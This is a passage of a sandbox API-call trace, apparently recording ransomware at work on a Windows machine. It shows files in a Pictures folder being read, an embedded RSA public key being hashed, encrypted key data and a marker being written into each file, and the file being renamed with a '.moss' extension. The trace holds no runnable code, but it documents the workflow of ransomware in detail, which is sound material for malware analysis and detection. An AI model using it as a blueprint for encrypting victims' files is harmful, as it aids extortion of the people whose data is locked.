hTemplateFile=0x0) returned 0x664 [0172.783] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=62013) returned 1 [0172.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.786] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf217, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.786] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.787] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.787] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf23d, lpOverlapped=0x0) returned 1 [0172.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.788] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.789] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.789] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.789] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.789] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.789] GetLastError () returned 0x0 [0172.789] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.789] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.789] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.789] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.789] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.789] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.790] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf23d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.790] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0172.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0172.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0172.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.790] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0172.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0172.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0172.790] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0172.791] CloseHandle (hObject=0x664) returned 1 [0172.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xe0) returned 0x3625d70 [0172.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8f0) returned 0x3b44498 [0172.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3625d70 | out: hHeap=0xcd0000) returned 1 [0172.795] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\ASf5fAM9fGnGvxI4jO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\asf5fam9fgngvxi4jo.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\ASf5fAM9fGnGvxI4jO.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\asf5fam9fgngvxi4jo.gif.moss")) returned 1 [0172.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.796] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.797] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cdc89e0, ftCreationTime.dwHighDateTime=0x1d5e28f, ftLastAccessTime.dwLowDateTime=0xc8b49660, ftLastAccessTime.dwHighDateTime=0x1d5e45c, ftLastWriteTime.dwLowDateTime=0xc8b49660, ftLastWriteTime.dwHighDateTime=0x1d5e45c, nFileSizeHigh=0x0, nFileSizeLow=0x237c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DJGdhVBMBO.png", cAlternateFileName="DJGDHV~1.PNG")) returned 1 [0172.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0172.797] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11e) returned 0x35ceae8 [0172.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0172.797] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\DJGdhVBMBO.png") returned=".png" [0172.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\DJGdhVBMBO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\djgdhvbmbo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.798] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=9084) returned 1 [0172.798] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.800] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2356, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.800] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.801] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.801] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.801] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x237c, lpOverlapped=0x0) returned 1 [0172.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.801] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.801] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.801] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.802] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.802] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.802] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.802] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.803] GetLastError () returned 0x0 [0172.803] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.803] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.803] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.803] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.803] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2380) returned 0x3b58120 [0172.803] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b577b0 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e6d0 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b577f8 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e6e8 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e718 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e730 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.803] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.803] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e718 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e730 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e730 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e718 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e730 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e718 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0172.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.804] GetCurrentThreadId () returned 0x324 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0172.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b54460 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0xd23a00 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.805] GetCurrentThreadId () returned 0x324 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xdc53e8 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e718 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0172.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e730 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e700 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddb8 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e748 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0172.806] HeapFree (in: hHeap=0xcd0000, 